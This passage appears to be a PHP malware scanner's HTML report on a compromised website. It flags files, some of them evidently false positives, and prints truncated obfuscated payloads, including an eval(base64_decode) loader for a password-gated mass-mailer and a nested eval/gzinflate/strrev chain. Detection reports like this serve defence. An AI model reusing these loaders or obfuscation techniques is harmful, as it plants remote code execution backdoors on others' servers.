</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 596</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 629</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 692</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 913</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 942</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 944</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 946</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 960</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 974</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1719</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_126").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ztuuu.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 216.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:16:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:16:37</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_127" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICAgfQogICAgZWxzZSB7CiA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 162cf671 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 162cf671)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">hcnJheV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 407651f7 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 407651f7)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">wcmludG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7186bb8d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7186bb8d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RfUE9TV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">N0cl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7f5d33bf <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7f5d33bf)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">JF9SRVFVRVNU</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">leGVjK</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">pbmNsdWRl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">c3Rhd</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3Blb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Z1bmN0aW9u</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VjaG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign e6546205 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: e6546205)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">kX1BPU1</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ee1cb326 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ee1cb326)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">9wZW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ff4f5344 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ff4f5344)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FycmF5X</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_127").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/zpdjv.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 52.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:43:59</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:43:59</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_128" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwRtF3uTXMQDYJ2O8umyGtGsMsdkHxFjTSqmY1beQbJ7x0Ls9WyJ6ASK9QrEzGTf7IdPIPre8mqhI9eodyFMNj9YGRJDn4CcfJ2kg2eIoDbWPphXTbRPGymWPdoz2ZTpl06XQOtLLx7gsxvK3Irk9BTH1PqIsFBobKuAAvoc0SoCKu93DeTNctdZDxvZmgGsswABEIsOaUOsA2MUKfu9SxAH8JNoIXBOCmP6yV9cgTI617pcLxXozLLp4CBgY6DKMgckypa8MEWDrpi0uDksDJcp9nY1MVP05l9w4HNHAr3s0crA8C0jhvHHHTYlLPxeNcFoVSCkMXiWORKVrbYrMaYRShWQq0pJFhNkC7vDJ1G0TBv51pj82gTS...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strrev</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">$_xwynUOL</span><span style="color: #007700">(</span><span style="color: #0000BB">_6Zys</span><span style="color: #007700">(</span><span style="color: #0000BB">$_cCzFdr</span><span style="color: #007700">))));}eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(</span><span style="color: #0000BB">_r5Me0FNrh83UY9xZt</span><span style="color: #007700">(</span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwR</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2P</span>
</span>
